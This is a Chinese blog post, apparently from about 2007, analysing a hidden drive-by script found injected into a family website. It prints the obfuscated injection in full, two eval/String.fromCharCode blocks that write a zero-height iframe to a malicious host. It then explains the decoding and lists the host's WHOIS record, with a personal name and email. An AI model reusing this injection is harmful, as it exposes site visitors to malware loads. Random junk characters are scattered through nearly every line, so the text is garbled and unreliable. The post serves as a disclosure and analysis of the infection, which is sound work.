首发在我的博客里面,
@ N@
!Q 'u#c_m!9 http://www.areway.cn/?p=175 5oe{i/#di F2>W{-H+ .~a.mT 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
< ZG!w^ \ nUJ)w <script>t=’60,105,102,114,97,109,101,
>:bXw#w] 32,115,114,99,61,104,116,116,112,58,47,47,
WCYVon bg" 102,114,101,101,46,117,45,117,117,117,46,99,
?!.L#]23f 110,47,101,114,114,111,114,46,104,116,109,
% !>@m6JK 32,119,105,100,116,104,61,49,48,48,32,104,
w5+(A_ 101,105,103,104,116,61,48,62,60,47,105,102,
:sS4T&@1= 114,97,109,101,62′;
E{'Y>gB6 t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
a"{b}UP OI,F,4e <script>t=’60,105,102,114,97,109,101,32,115,
j;<s!A#
114,99,61,104,116,116,112,58,47,47,102,114,
]pWn%aGv*Y 101,101,46,117,45,117,117,117,46,99,110,47,
J1R5_b 101,114,114,111,114,46,104,116,109,32,119,
2"QcjFW% 105,100,116,104,61,49,48,48,32,104,101,105,
z%;_h- 103,104,116,61,48,62,60,47,105,102,114,97,
lMmP]{.>$ 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
C';Dc4j document.write(t);</script>
2c'<rkA uovSe4q5q <html xmlns=”
*m8{yh http://www.w3.org/1999/xhtml $WiUoS “>
^KJi|'B <head>
A6I^`0/ <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
@8Cja.H <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
<M,<|Y*) <title>首页 - 爱生活家庭网
?L| Ai\| 0Q~\1D 9g 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
^)o#/"JA 转换字符串后的大概内容是(谁点击后果自付):
C{G;G@/7 <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
_n0NE0 QuBA'4ht 查询玉米u-uuu.cn的详细信息:
RNopx3 Domain Name: u-uuu.cn
a`D`v5G t ROID: 20070901s10001s64972306-cn
(+nnX7V?I Domain Status: ok
vW0U~(XlN Registrant Organization: 王雷
ck$> Registrant Name: 王雷
:7*9W|e
Administrative Email:
czlovexs@126.com 5,BvT>zFY Sponsoring Registrar: 北京万网志成科技有限公司
KP`Pzx Name Server:ns.yovole.com
WQ9VcCY Name Server:ns1.yovole.com
Ri3*au/Q Registration Date: 2007-09-01 17:54
5S ) N&% Expiration Date: 2008-09-01 17:54
zCS&